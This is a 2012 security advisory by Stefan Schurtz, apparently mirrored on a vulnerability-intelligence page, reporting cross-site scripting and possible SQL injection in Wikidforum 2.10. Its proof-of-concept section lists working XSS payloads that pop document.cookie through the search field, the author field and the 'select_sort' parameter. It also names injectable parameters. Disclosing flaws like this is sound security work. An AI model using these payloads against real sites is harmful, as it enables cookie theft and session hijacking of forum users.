Lucene search
Wikidforum 2.10 Cross Site Scripting / SQL Injection
🗓️ 12 Mar 2012 00:00:00Reported by Stefan SchurtzType 
packetstorm🔗 packetstormsecurity.com👁 16 Views
Wikidforum 2.10 Multiple security vulnerabilities, prone to XSS and SQL-Injectio
Show more
`Advisory: Wikidforum 2.10 Multiple security vulnerabilities
Advisory ID: SSCHADV2012-005
Author: Stefan Schurtz
Affected Software: Successfully tested on Wikidforum 2.10
Vendor URL: http://www.wikidforum.com/
Vendor Status: informed
==========================
Vulnerability Description
==========================
Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities
==================
PoC-Exploit
==================
// xss
Search-Field -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>
// possible SQL-Injection
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]
=========
Solution
=========
-
====================
Disclosure Timeline
====================
19-Feb-2012 - vendor informed
10-Mar-2012 - no response from vendor
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo12 Mar 2012 00:00Current
0.2Low risk
Vulners AI Score0.2